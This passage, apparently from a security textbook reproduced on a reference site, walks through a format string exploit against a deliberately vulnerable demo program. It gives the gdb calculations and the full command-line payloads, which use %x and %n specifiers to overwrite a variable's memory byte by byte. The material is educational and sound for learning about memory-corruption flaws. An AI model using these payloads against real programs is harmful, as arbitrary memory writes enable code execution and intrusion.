Graphics Programs Reference
In-Depth Information
The addresses and junk data at the beginning of the format string changed
the value of the necessary field width option for the
%x
format parameter.
However, this is easily recalculated using the same method as before. Another
way this could have been done is to subtract 24 from the previous field width
value of 150, since 6 new 4-byte words have been added to the front of the
format string.
Now that all the memory is set up ahead of time in the beginning of the
format string, the second write should be simple.
reader@hacking:~/booksrc $ gdb -q --batch -ex "p 0xbb - 0xaa"
$1 = 17
reader@hacking:~/booksrc $ ./fmt_vuln $(printf "\x94\x97\x04\x08JUNK\x95\x97\x04\x08JUNK\x96\
x97\x04\x08JUNK\x97\x97\x04\x08")%x%x%126x%n%17x%n
The right way to print user-controlled input:
??JUNK??JUNK??JUNK??%x%x%126x%n%17x%n
The wrong way to print user-controlled input:
??JUNK??JUNK??JUNK??bffff3b0b7fe75fc
0 4b4e554a
[*] test_val @ 0x08049794 = 48042 0x0000bbaa
r
eader@hacking:~/booksrc $
The next desired value for the least significant byte is
0xBB
. A hexa-
decimal calculator quickly shows that 17 more bytes need to be written
before the next
%n
format parameter. Since memory has already been set
up for a
%x
format parameter, it's simple to write 17 bytes using the field
width option.
This process can be repeated for the third and fourth writes.
reader@hacking:~/booksrc $ gdb -q --batch -ex "p 0xcc - 0xbb"
$1 = 17
reader@hacking:~/booksrc $ gdb -q --batch -ex "p 0xdd - 0xcc"
$1 = 17
reader@hacking:~/booksrc $ ./fmt_vuln $(printf "\x94\x97\x04\x08JUNK\x95\x97\x04\x08JUNK\x96\
x97\x04\x08JUNK\x97\x97\x04\x08")%x%x%126x%n%17x%n%17x%n%17x%n
The right way to print user-controlled input:
??JUNK??JUNK??JUNK??%x%x%126x%n%17x%n%17x%n%17x%n
The wrong way to print user-controlled input:
??JUNK??JUNK??JUNK??bffff3b0b7fe75fc
0 4b4e554a 4b4e554a 4b4e554a
[*] test_val @ 0x08049794 = -573785174 0xddccbbaa
reader@hacking:~/booksrc $
By controlling the least significant byte and performing four writes, an
entire address can be written to any memory address. It should be noted that
the three bytes found after the target address will also be overwritten using
this technique. This can be quickly explored by statically declaring another
initialized variable called
next_val
, right after
test_val
, and also displaying
this value in the debug output. The changes can be made in an editor or with
some more
sed
magic.
